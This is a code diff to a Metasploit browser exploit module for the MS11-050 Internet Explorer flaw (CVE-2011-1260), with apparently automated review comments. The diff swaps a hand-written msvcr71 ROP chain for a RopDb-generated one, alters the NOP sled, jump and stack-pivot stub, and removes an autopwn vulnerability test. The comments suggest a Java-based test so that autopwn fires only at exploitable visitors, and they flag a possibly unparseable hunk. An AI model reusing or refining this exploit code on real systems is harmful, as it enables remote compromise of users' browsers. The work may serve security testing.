diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
index 203a776596..7b86c68a5b 100644
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
 :ua_name => HttpClients::IE,
 :ua_minver => "7.0",
 :ua_maxver => "8.0",
 :javascript => true,
- :os_name => OperatingSystems::WINDOWS,
- # If it's IE 8, then we need .net to bypass ASLR
- :vuln_test => %Q|
- if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
- if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
- }
- |,
+ :os_name => OperatingSystems::WINDOWS
 })
 def initialize(info={})
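Review bot: Dropping the IE 8 `:vuln_test` removes the only runtime check that the non-ASLR module the ROP chain depends on is actually present on the client, and nothing in this hunk replaces it. The chain now comes from `generate_rop_payload('java', ...)`, which by the RopDb name presumably relies on the JRE's msvcr71.dll, so BrowserAutopwn will fire this module at every IE 8 visitor including ones without Java, where the pivot can only crash the tab and burn the one shot. A replacement test keyed on Java rather than .NET, along the lines of `:vuln_test => %Q| if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) { is_vuln = !!navigator.javaEnabled(); } |`, would keep autopwn's target selection honest. Whether the `Targets` / `'Rop'` selection has its own guard is outside this hunk.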
@@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote
 to bypass DEP (Data Execution Prevention).
 },
 'License' => MSF_LICENSE,
- 'Version' => "$Revision$",
 'Author' =>
 [
 'd0c_s4vage', #Discovery, poc
 'sinn3r', #ROP (thx corelanc0d3r), Windows 7
- 'bannedit', #Windows 7
+ 'bannedit' #Windows 7
 ],
 'References' =>
 [
 ['CVE', '2011-1260'],
 ['OSVDB', '72950'],
 ['MSB', 'MS11-050'],
- ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
+ ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
 ],
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'InitialAutoRunScript' => 'migrate -f',
+ 'InitialAutoRunScript' => 'migrate -f'
 },
 'Payload' =>
 {
 'Space' => 500,
 'BadChars' => "\x00\x09\x0a\x0d'\\",
- 'StackAdjustment' => -3500,
+ 'StackAdjustment' => -3500
 },
 'Platform' => 'win',
 'Targets' =>
@@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote
 return
 end
- #In case we're using ROP, initialize it now
- code = ''
- if mytarget['Rop']
- # !mona -m msvcr71 rop
- code = [
- 0x7c376402, # POP EBP # RETN [msvcr71.dll]
- 0x7c376402, # skip 4 bytes [msvcr71.dll]
- 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
- 0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
- 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
- 0x7c354901, # POP EBX # RETN [msvcr71.dll]
- 0xffffffff,
- 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
- 0x7c344f87, # POP EDX # RETN [msvcr71.dll]
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
- 0x7c34d201, # POP ECX # RETN [msvcr71.dll]
- 0x7c38b001, # &Writable location [msvcr71.dll]
- 0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
- 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
- 0x7c364802, # POP ESI # RETN [msvcr71.dll]
- 0x7c3415a2, # JMP [EAX] [msvcr71.dll]
- 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
- 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
- ].pack("V*")
+ p = make_nops(44) #Nops
+ p << "\xeb\x04\xff\xff" #Jmp over the pivot
+ p << [mytarget.ret].pack('V') #Stack pivot
+ p << payload.encoded
- code << "\x90"*20 #Nops
- code << "\xeb\x04\xff\xff" #Jmp over the pivot
- code << [mytarget.ret].pack('V') #Stack pivot
+ rop_payload = generate_rop_payload('java', p)
 end
- code << payload.encoded
+ code = (rop_payload) ? rop_payload : payload.encoded
 # fill the vtable
 vtable = [mytarget['TargetAddr']].pack('V*')
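Review bot: The new stub is built in a local named `p`, which shadows `Kernel#p` for the rest of the method and reads as a debugging call at a glance; a descriptive name such as `stub = make_nops(44)` with `stub <<` for the three appends costs nothing. The NOP count also silently changes from the old 20 to 44 with no explanation, and since it presumably pads to wherever the RopDb `'java'` chain lands after its `VirtualProtect`, a comment like `# 44 bytes of padding so the RopDb 'java' (msvcr71.dll) chain lands in the sled before the pivot` would spare the next reader a trip into RopDb to re-derive it. As shown, the hunk removes `if mytarget['Rop']` yet keeps the closing ` end` as context, which cannot parse on its own, so either the conditional is reintroduced outside what is visible or the hunk is incomplete; worth confirming before merge. The enclosing method starts and ends outside this hunk.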